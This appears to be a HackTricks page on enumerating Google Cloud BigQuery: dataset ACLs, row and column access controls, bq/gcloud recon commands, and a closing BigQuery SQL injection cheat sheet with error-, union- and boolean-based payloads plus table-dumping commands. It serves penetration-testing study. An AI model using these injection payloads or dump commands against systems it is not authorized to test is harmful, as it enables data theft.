# GCP - Bigquery Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}
## Basic Information
Google Cloud BigQuery is a **fully-managed, serverless enterprise data warehouse**, offering capabilities for **analysis over petabytes** of data, thus handling large-scale datasets efficiently. As a Platform as a Service (PaaS), it provides users with infrastructure and tools to facilitate data management without the need for manual oversight.

It supports querying using **ANSI SQL**. The main objects are **datasets**, which contain **tables**, which contain the SQL **data**.
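
As a quick illustration of that hierarchy, a dataset and a table inside it could be created with the `bq` CLI (the names below are placeholders):

```bash
# Create a dataset in the current project and a table inside it
bq mk --dataset mydataset
bq mk --table mydataset.mytable name:STRING,age:INTEGER

# The hierarchy is then visible when listing
bq ls           # datasets in the project
bq ls mydataset # tables inside the dataset
```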
### Encryption
By default a **Google-managed encryption key** is used, although it's possible to configure a **customer-managed encryption key (CMEK)**. The encryption key can be indicated per dataset and per table inside a dataset.
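
For example, a dataset could be created with a default CMEK and the configured key checked afterwards (a sketch; the key path is a placeholder):

```bash
# Create a dataset whose new tables will be encrypted with a customer-managed key
bq mk --default_kms_key projects/<proj>/locations/<location>/keyRings/<ring>/cryptoKeys/<key> --dataset <proj>:<dataset>

# The key (if any) shows up under "defaultEncryptionConfiguration"
bq show --format=prettyjson <proj>:<dataset>
```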
### Expiration
It's possible to indicate an **expiration time in a dataset** so that any new table created in it will be **automatically deleted** the specified number of days after its creation.
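
As a sketch, with the `bq` CLI the default expiration is expressed in seconds (placeholder names):

```bash
# New tables in the dataset will be deleted ~7 days (604800s) after creation
bq mk --default_table_expiration 604800 --dataset <proj>:<dataset>

# Or set/change it on an existing dataset
bq update --default_table_expiration 604800 <proj>:<dataset>
```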
### External Sources
BigQuery is deeply integrated with other Google services. It's possible to load data from buckets, Pub/Sub, Google Drive, Cloud SQL databases...
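
For instance, loading a CSV file from a bucket, or exposing it as an external table, might look like this (a sketch with placeholder names):

```bash
# Load a CSV from a bucket into a table (schema autodetected)
bq load --source_format=CSV --autodetect <proj>:<dataset>.<table> gs://<bucket>/data.csv

# Or query the file in place via an external table definition
bq mkdef --source_format=CSV "gs://<bucket>/data.csv" > /tmp/def.json
bq mk --external_table_definition=/tmp/def.json <proj>:<dataset>.<ext_table>
```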
### Dataset ACLs
When a dataset is created, **ACLs are attached** to grant access over it. By default, **Owner** privileges are given to the **user that created** the dataset, **Owner** to the group **projectOwners** (owners of the project), **Writer** to the group **projectWriters**, and **Reader** to the group **projectReaders**:
```bash
bq show --format=prettyjson <proj>:<dataset>

...
"access": [
  {
    "role": "WRITER",
    "specialGroup": "projectWriters"
  },
  {
    "role": "OWNER",
    "specialGroup": "projectOwners"
  },
  {
    "role": "OWNER",
    "userByEmail": "gcp-admin@hacktricks.xyz"
  },
  {
    "role": "OWNER",
    "userByEmail": "support@hacktricks.xyz"
  },
  {
    "role": "READER",
    "specialGroup": "projectReaders"
  }
],
...
```
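
With enough privileges these ACLs can be modified by dumping the dataset metadata, editing the `access` array and pushing it back (a sketch):

```bash
# Dump the dataset metadata (including the "access" ACLs) to a file
bq show --format=prettyjson <proj>:<dataset> > /tmp/ds.json

# Edit the "access" array in /tmp/ds.json, then apply the changes
bq update --source /tmp/ds.json <proj>:<dataset>
```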
### Table Row Access Control
It's possible to **control which rows a principal is able to access inside a table** with row access policies. These are defined inside the table using [**DDL**](https://cloud.google.com/bigquery/docs/reference/standard-sql/data-definition-language#create_row_access_policy_statement).\
The access policy defines a filter, and **only the rows matching** that filter are going to be **accessible** by the indicated principals.
```sql
# Create
CREATE ROW ACCESS POLICY apac_filter
ON project.dataset.my_table
GRANT TO ('user:abc@example.com')
FILTER USING (region = 'APAC');

# Update (CREATE OR REPLACE overwrites an existing policy)
CREATE OR REPLACE ROW ACCESS POLICY sales_us_filter
ON project.dataset.my_table
GRANT TO ('user:john@example.com',
'group:sales-us@example.com',
'group:sales-managers@example.com')
FILTER USING (region = 'US');

# Check the Post Exploitation tricks to see how to call this from the cli
```
```bash
# Enumerate row policies on a table
bq ls --row_access_policies <proj>:<dataset>.<table> # Get row policies
```
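
Row access policies can also be removed via DDL, e.g. (a sketch reusing the placeholder table from above):

```bash
# Drop one policy, or all of them, through bq query
bq query --nouse_legacy_sql 'DROP ROW ACCESS POLICY apac_filter ON `project.dataset.my_table`'
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `project.dataset.my_table`'
```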
### Column Access Control
<figure><img src="../../../.gitbook/assets/image (12).png" alt=""><figcaption></figcaption></figure>

To restrict data access at the column level:
1. **Define a taxonomy and policy tags**. Create and manage a taxonomy and policy tags for your data. [https://console.cloud.google.com/bigquery/policy-tags](https://console.cloud.google.com/bigquery/policy-tags)
2. Optional: Grant the **Data Catalog Fine-Grained Reader role to one or more principals** on one or more of the policy tags you created.
3. **Assign policy tags to your BigQuery columns**. In BigQuery, use schema annotations to assign a policy tag to each column where you want to restrict access (see the sketch after this list).
4. **Enforce access control on the taxonomy**. Enforcing access control causes the access restrictions defined for all of the policy tags in the taxonomy to be applied.
5. **Manage access on the policy tags**. Use [Identity and Access Management](https://cloud.google.com/iam) (IAM) policies to restrict access to each policy tag. The policy is in effect for each column that belongs to the policy tag.
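
For step 3, one way to attach a policy tag to a column is via a schema update with the `bq` CLI (a sketch; the taxonomy and policy-tag IDs are placeholders):

```bash
# Dump the current schema of the table
bq show --schema <proj>:<dataset>.<table> > /tmp/schema.json

# Edit /tmp/schema.json and add a "policyTags" entry to the column to protect, e.g.:
# {"name":"username","type":"STRING","policyTags":{"names":["projects/<proj>/locations/<location>/taxonomies/<taxonomy-ID>/policyTags/<tag-ID>"]}}

# Push the modified schema back to the table
bq update <proj>:<dataset>.<table> /tmp/schema.json
```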
When a user tries to access column data at query time, BigQuery **checks the column policy tag and its policy to see whether the user is authorized to access the data**.

{% hint style="success" %}
In summary, to restrict the access to some columns to some users, you can **add a tag to the column in the schema and restrict the access** of the users to the tag by enforcing access control on the taxonomy of the tag.
{% endhint %}

To enforce access control on the taxonomy, the following service needs to be enabled:
```bash
gcloud services enable bigquerydatapolicy.googleapis.com
```
It's possible to see the tags of columns with:

{% code overflow="wrap" %}
```bash
bq show --schema <proj>:<dataset>.<table>

[{"name":"username","type":"STRING","mode":"NULLABLE","policyTags":{"names":["projects/.../locations/us/taxonomies/2030629149897327804/policyTags/7703453142914142277"]},"maxLength":"20"},{"name":"age","type":"INTEGER","mode":"NULLABLE"}]
```
{% endcode %}
### Enumeration
{% code overflow="wrap" %}
```bash
# Dataset info
bq ls # List datasets
bq ls -a # List all datasets (even hidden)
bq ls <proj>:<dataset> # List tables in a dataset
bq show --format=prettyjson <proj>:<dataset> # Get info about the dataset (like ACLs)

# Tables info
bq show --format=prettyjson <proj>:<dataset>.<table> # Get table info
bq show --schema <proj>:<dataset>.<table> # Get schema of a table

# Get entries from the table
bq head <dataset>.<table>
bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table-name>` LIMIT 1000'
bq extract <dataset>.<table> "gs://<bucket>/table*.csv" # Use the * so it can dump everything in different files

# Insert data
bq query --nouse_legacy_sql 'INSERT INTO `digital-bonfire-410512.importeddataset.tabletest` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'
bq insert dataset.table /tmp/mydata.json

# Get permissions
bq get-iam-policy <proj>:<dataset> # Get dataset IAM policy
bq show --format=prettyjson <proj>:<dataset> # Get dataset ACLs
bq get-iam-policy <proj>:<dataset>.<table> # Get table IAM policy
bq ls --row_access_policies <proj>:<dataset>.<table> # Get row policies

# Taxonomies (get the IDs from the schemas of the tables)
gcloud data-catalog taxonomies describe <taxonomy-ID> --location=<location>
gcloud data-catalog taxonomies list --location <location> # Find more
gcloud data-catalog taxonomies get-iam-policy <taxonomy-ID> --location=<location>

# Get jobs executed
bq ls --jobs=true --all=true
bq show --location=<location> --format=prettyjson --job=true <job-id>

# Misc
bq show --encryption_service_account # Get encryption service account
```
{% endcode %}
### BigQuery SQL Injection
For further information you can check the blog post [https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac). Only a few details are given here.

**Comments**:
* `select 1#from here it is not working`
* `select 1/*between those it is not working*/` (but an opening `/*` alone, without the closing `*/`, won't work)
* `select 1--from here it is not working`

Get **information** about the **environment**, such as:
* Current user: `select session_user()`
* Project id: `select @@project_id`

Concat rows:
* All table names: `string_agg(table_name, ', ')`
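
For example, all the table names of a dataset could be exfiltrated in a single row (a sketch with placeholder names):

```bash
bq query --nouse_legacy_sql 'SELECT string_agg(table_name, ", ") FROM <proj>.<dataset>.INFORMATION_SCHEMA.TABLES'
```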
Get **datasets**, **tables** and **column** names:
* **Project** and **dataset** name:

{% code overflow="wrap" %}
```sql
SELECT catalog_name, schema_name FROM INFORMATION_SCHEMA.SCHEMATA
```
{% endcode %}
* **Column** and **table** names of **all the tables** of the dataset:

{% code overflow="wrap" %}
```sql
SELECT table_name, column_name FROM <project-name>.<dataset-name>.INFORMATION_SCHEMA.COLUMNS
```
{% endcode %}
* **Other datasets** in the same project:

{% code overflow="wrap" %}
```sql
SELECT catalog_name, schema_name, NULL FROM <project-name>.INFORMATION_SCHEMA.SCHEMATA
```
{% endcode %}

**SQL Injection types:**
* Error based - casting: `select CAST(@@project_id AS INT64)`
* Error based - division by zero: `' OR if(1/(length((select('a')))-1)=1,true,false) OR '`
* Union based (you need to use ALL in bigquery): `UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#`
* Boolean based: ``' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#``
* Potential time based - Usage of public datasets example: ``SELECT * FROM `bigquery-public-data.covid19_open_data.covid19_open_data` LIMIT 1000``
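
As a quick illustration, the error-based cast can be reproduced directly with `bq`, since the failed cast error leaks the casted value (the exact error text may vary):

```bash
# The query fails, but the error message contains the project id
bq query --nouse_legacy_sql 'SELECT CAST(@@project_id AS INT64)'
```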
**Documentation:**
* All function list: [https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators)
* Scripting statements: [https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting](https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting)
### Privilege Escalation & Post Exploitation
{% content-ref url="../gcp-privilege-escalation/gcp-bigquery-privesc.md" %}
[gcp-bigquery-privesc.md](../gcp-privilege-escalation/gcp-bigquery-privesc.md)
{% endcontent-ref %}
### Persistence
{% content-ref url="../gcp-persistence/gcp-bigquery-persistence.md" %}
[gcp-bigquery-persistence.md](../gcp-persistence/gcp-bigquery-persistence.md)
{% endcontent-ref %}
## References
* [https://cloud.google.com/bigquery/docs/column-level-security-intro](https://cloud.google.com/bigquery/docs/column-level-security-intro)

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}